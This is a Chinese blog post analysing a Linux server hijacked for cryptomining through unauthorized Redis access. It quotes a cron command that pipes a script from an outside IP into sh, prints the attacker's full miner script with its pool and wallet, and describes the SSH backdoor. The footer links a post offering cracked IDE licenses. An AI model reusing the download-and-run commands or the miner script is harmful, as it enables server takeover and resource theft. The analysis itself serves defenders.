1. 全栈程序员必看首页

linux挖矿病毒工具,Linux服务器挖矿病毒

全栈程序员-站长 未分类 阅读 33

linux挖矿病毒工具,Linux服务器挖矿病毒攻击者通过Redis未授权访问,写入定时任务,执行挖矿程序。排查过程检查进程发现SSH后门[root@testservertmp]#psaux|grep2345|grep-vgreproot135870.00.0666241144?SsMar220:00/tmp/su-oPort=2345[root@testservertmp]#lsof-p135…

大家好,又见面了,我是你们的朋友全栈君。

攻击者通过Redis未授权访问,写入定时任务,执行挖矿程序。

排查过程

检查进程发现SSH后门

[root@testserver tmp]# ps aux | grep 2345 | grep -v grep

root 13587 0.0 0.0 66624 1144 ? Ss Mar22 0:00 /tmp/su -oPort=2345

[root@testserver tmp]# lsof -p 13587

COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME

su 13587 root cwd DIR 202,2 4096 2 /

su 13587 root rtd DIR 202,2 4096 2 /

su 13587 root txt REG 202,2 546680 1718717 /usr/sbin/sshd

发现异常进程

root 1800 57064 0 00:46 ? 00:00:00 CROND

root 1801 1800 0 00:46 ? 00:00:00 /bin/sh -c curl -fsSL http://104.156.239.160:8080/conn.sh | sh

root 1803 1801 0 00:46 ? 00:00:03 sh

PS中看到很多定时任务进程CROND,crontab -l发现又是redis写进来的,那么再看下/root/.ssh/authorized_keys,果然也写了免登陆。

2712f039057ccb97c114e5670e73ab21.png

发现攻击者使用的脚本http://104.156.239.160:8080/conn.sh

脚本内容如下:

#!/bin/sh

ps -fe|grep conns |grep -v grep

if [ $? -ne 0 ]

then

echo “start process…..”

wget https://ooo.0o0.ooo/2017/01/15/587b626883fdc.png -O /tmp/conn

dd if=/tmp/conn skip=7664 bs=1 of=/tmp/conns

chmod +x /tmp/conns

nohup /tmp/conns -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 44xdB6UmabC8R69V6jDj7q1zGyDzJ7ks5GJpLs3b2HpqWwWq2xbvLKiRjmX8e9oy7426goZG9kXRTgHj9SZPGzfiQYtbTw1 -p x >/dev/null 2>&1 &

else

echo “runing…..”

fi

sleepTime=20

while [ 0 -lt 1 ]

do

ps -fe| grep conns | grep -v grep

if [ $? -ne 0 ]

then

echo “process not exists ,restart process now… “

wget https://ooo.0o0.ooo/2017/01/15/587b626883fdc.png -O /tmp/conn

dd if=/tmp/conn skip=7664 bs=1 of=/tmp/conns

chmod +x /tmp/conns

nohup /tmp/conns -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 44xdB6UmabC8R69V6jDj7q1zGyDzJ7ks5GJpLs3b2HpqWwWq2xbvLKiRjmX8e9oy7426goZG9kXRTgHj9SZPGzfiQYtbTw1 -p x >/dev/null 2>&1 &

echo “restart done ….. “

else

echo “process exists , sleep $sleepTime seconds “

fi

sleep $sleepTime

done

[root@server120 tmp]# file /tmp/conn

/tmp/conn: PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced

首先下载了一个图片,然后通过dd提取出来挖矿程序。

[root@server120 tmp]# file /tmp/conns

/tmp/conns: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, stripped

然后每20S检查一下进程是否存活。

这种通过Redis未授权拿服务器挖矿的情况很常见。

处理过程

1)redis增加认证,清空/var/spool/cron/root和authorized_keys。

2)删除后门

3)Kill异常进程

4)重启

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/131889.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长
0 0


相关推荐

  • ibatis isnotequal_英语中is和are的用法

    ibatis isnotequal_英语中is和are的用法

    ibatis isnotequal_英语中is和are的用法一:isEquals用于动态拼接sql如下实例:如果status的状态为0,则更新attribute1;状态为1,则更新attribute2;状态为2,则更新attribute3。<updateid="topup.doEffect"parameterClass="java.util.HashMap">updatecis_customersetcode_id=…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年9月28日
    2
  • 2021pycharm激活码【最新永久激活】 idea

    2021pycharm激活码【最新永久激活】

    (2021pycharm激活码)最近有小伙伴私信我,问我这边有没有免费的intellijIdea的激活码,然后我将全栈君台教程分享给他了。激活成功之后他一直表示感谢,哈哈~IntelliJ2021最新激活注册码,破解教程可免费永久激活,亲测有效,下面是详细链接哦~https://javaforall.net/100143.htmlS3…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年3月26日
    120
  • 拆解量化交易模型

    拆解量化交易模型

    拆解量化交易模型量化交易看起来似乎就是用机器炒股,没什么大惊小怪的。但是我们拆解开量化交易的模型,您就知道其中的奥秘了。首先是输入环节:假如你是量化交易建模师。你把各种你觉得会影响股价波动的重要因素的相关数据输入到程序中。我们把常用的一种多因子选股的模型展示给大家。各种因子,您就可以理解为是炒股要看的内容。比如普通人要看公司、行业、估值、成交量、业绩等。这些都可以作为因素,将其内含数据包输入到程序里,当做因子之一。估值类因子1、预测最近年度每股股利2、未来12个月预测净利润3、每股收益

    全栈程序员-站长的头像 全栈程序员-站长
    2022年6月26日
    29
  • 背景图片的精灵图的使用

    背景图片的精灵图的使用

    背景图片的精灵图的使用<!DOCTYPEhtml><html><head><metacharset="utf-8"/><metahttp-equiv="X-UA-Compatible"content="IE=edge"><title>背景图片的精灵图的使用<

    全栈程序员-站长的头像 全栈程序员-站长
    2022年6月9日
    30
  • Spring系列(一) Spring的核心「建议收藏」

    Spring系列(一) Spring的核心「建议收藏」

    Spring系列(一) Spring的核心「建议收藏」Spring系列(一) Spring的核心

    全栈程序员-站长的头像 全栈程序员-站长
    2022年4月20日
    33
  • Navicat连接MySQL失败1251

    Navicat连接MySQL失败1251

    Navicat连接MySQL失败1251错误提示:1251-Clientdoesnotsupportauthenticationprotocolrequestedbyserver;considerupgradingMySQLclient原因:MySQL8版本以上采用新的加密方式,旧的不能用解决办法:更改MySQL的加密方式ALTERUSER’root’@’localhost’IDENTIFIE…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年10月14日
    3

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号